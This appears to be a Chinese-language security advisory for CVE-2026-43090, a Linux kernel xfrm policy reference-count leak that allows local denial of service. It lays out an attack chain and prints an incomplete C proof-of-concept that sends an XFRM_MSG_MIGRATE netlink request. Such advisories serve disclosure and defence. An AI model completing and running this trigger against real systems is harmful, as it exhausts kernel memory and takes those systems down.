CVE-2026-43090 CVSS 5.5 中危

CVE-2026-43090: Linux内核xfrm策略引用计数泄漏

披露日期: 2026-05-06

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-43090

漏洞类型

内存泄漏

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核net/xfrm模块存在引用计数泄漏漏洞。在xfrm_migrate_policy_find函数中，由于错误地重复调用xfrm_pol_hold_rcu，导致引用计数失衡。这使得已分配的xfrm_policy对象无法被正确释放，造成内存泄漏。本地低权限攻击者可利用此漏洞耗尽系统内存，从而影响系统可用性。

技术细节

该漏洞源于Linux内核net/xfrm/xfrm_policy.c中的xfrm_migrate_policy_find函数。该函数在查找策略时，查找函数本身已返回一个持有引用计数的策略对象，但代码逻辑中又额外调用了一次xfrm_pol_hold_rcu()。这种双重持有导致引用计数无法归零，进而阻止内存回收。攻击者可通过发送特制的xfrm策略迁移请求触发该路径，反复利用可导致内核内存持续耗尽，最终触发OOM Killer或导致系统死锁，造成拒绝服务。

攻击链分析

STEP 1

步骤1：本地访问

攻击者需要拥有本地系统的低权限访问权限。

STEP 2

步骤2：触发漏洞

通过系统调用或Netlink套接字触发xfrm策略迁移功能。

STEP 3

步骤3：引用计数失衡

内核执行xfrm_migrate_policy_find函数，导致xfrm_pol_hold_rcu被重复调用。

STEP 4

步骤4：内存泄漏

策略对象引用计数无法归零，内存无法被回收。

STEP 5

步骤5：拒绝服务

持续触发导致系统内存耗尽，影响系统可用性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC for CVE-2026-43090: Memory leak in xfrm_migrate_policy_find
 * This is a conceptual trigger for the vulnerability.
 * Compile: gcc -o poc poc.c
 */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>
#include <linux/xfrm.h>

// Simplified trigger logic demonstrating the system call context
// Exploitation requires specific netlink message crafting to hit xfrm_migrate
void trigger_leak() {
    int sock_fd;
    struct sockaddr_nl sa;
    char buf[4096];
    struct nlmsghdr *nlh;

    sock_fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM);
    if (sock_fd < 0) {
        perror("socket");
        return;
    }

    memset(&sa, 0, sizeof(sa));
    sa.nl_family = AF_NETLINK;
    bind(sock_fd, (struct sockaddr *)&sa, sizeof(sa));

    memset(buf, 0, sizeof(buf));
    nlh = (struct nlmsghdr *)buf;
    // Construct a migration request to trigger the vulnerable path
    nlh->nlmsg_type = XFRM_MSG_MIGRATE; 
    nlh->nlmsg_flags = NLM_F_REQUEST;
    nlh->nlmsg_len = NLMSG_SPACE(sizeof(struct xfrm_userpolicy_info));

    // ... (Fill in policy details to ensure migration path is taken)
    // Repeated calls here would cause kernel memory leak

    send(sock_fd, buf, nlh->nlmsg_len, 0);
    close(sock_fd);
}

int main() {
    printf("Triggering CVE-2026-43090 memory leak...\n");
    trigger_leak();
    return 0;
}

影响范围

Linux Kernel (具体版本参考Git提交记录)

防御指南

临时缓解措施

建议限制本地非特权用户的操作权限，并监控系统内存使用情况。若无法立即升级，应关注内核日志中的内存泄漏报警。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表